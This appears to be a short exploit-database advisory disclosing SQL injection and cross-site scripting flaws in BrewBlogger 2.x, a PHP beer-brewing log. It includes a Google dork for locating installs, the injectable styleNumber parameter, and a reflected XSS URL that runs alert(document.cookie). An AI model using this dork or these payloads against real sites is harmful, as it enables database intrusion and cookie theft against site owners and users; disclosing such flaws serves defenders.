facebook facebook twitter rss

BrewBlogger 2.x.x SQLi/XSS vulnerabilities

Author: TUNISIAN CYBER , Published: 04-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: BrewBlogger 2.x.x SQLi/XSS vulnerabilities
[+] Date: 31-12-2013
[+] Category: WebApp
[+] Version: 2.X.X (the 1.X.X could be infected too)
[+] Google Dork: :intext:"BrewBlogger Personal Edition developed by zkdigital.com"
[+] Tested on: KaliLinux
[+] Vendor: http://sourceforge.net/projects/brewblogger/
[+} Friend's blog: www.na3il.com



########################################################################################
v2.3.2 sqli/XSS ('Brendan Coles')
http://1337day.com/exploit/16383

+Description:
BrewBlogger is a easy to set up, easy to use, web-based beer homebrewing log.
It is a PHP/MySQL-based system that provides today's brewer not only an easy way to record their beer brewing activities,
but also blog-like forum to share their efforts.


+Exploit:
BrewBlogger Suffers from an XSS/SQLi vulnerabilities:

1/SQLi:
http://127.0.0.1/BrewBlogger2.x.x/brewblogger/sections/reference.inc.php?source=log&section=styles&styleNumber=[SQL]
LocalTest>http://i.imgur.com/ymuyxVS.png

2/XSS:
http://127.0.0.1/BrewBlogger2.3.1/brewblogger/index.php?page=brewBlogList&style=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cp+%22
LocalTest>http://i.imgur.com/AYu8Rl9.png

./3nD

########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt , Exploit4arabTeam
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :